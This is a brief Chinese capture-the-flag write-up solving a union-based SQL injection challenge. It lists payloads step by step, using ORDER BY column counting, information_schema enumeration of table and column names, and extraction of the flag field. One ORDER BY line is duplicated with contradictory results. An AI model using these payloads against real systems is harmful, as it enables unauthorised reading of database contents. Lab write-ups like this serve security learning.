NulL-SQL注入-1|联合查询|

1.确认是字符型注入


1' #无回显
1' --+ #有回显


2.order by确认共有3列
1' order by 3 --+ #有回显
1' order by 3 --+ #无回显

2.union注入，确认显示位 `-1' union select 1,2,3 --+` #回显2 3



3.获取表名：fl4g,notes

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

4.获取字段名：fllllag

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='fl4g' --+




5.获取flag
-1' union select 1,2,fllllag from fl4g --+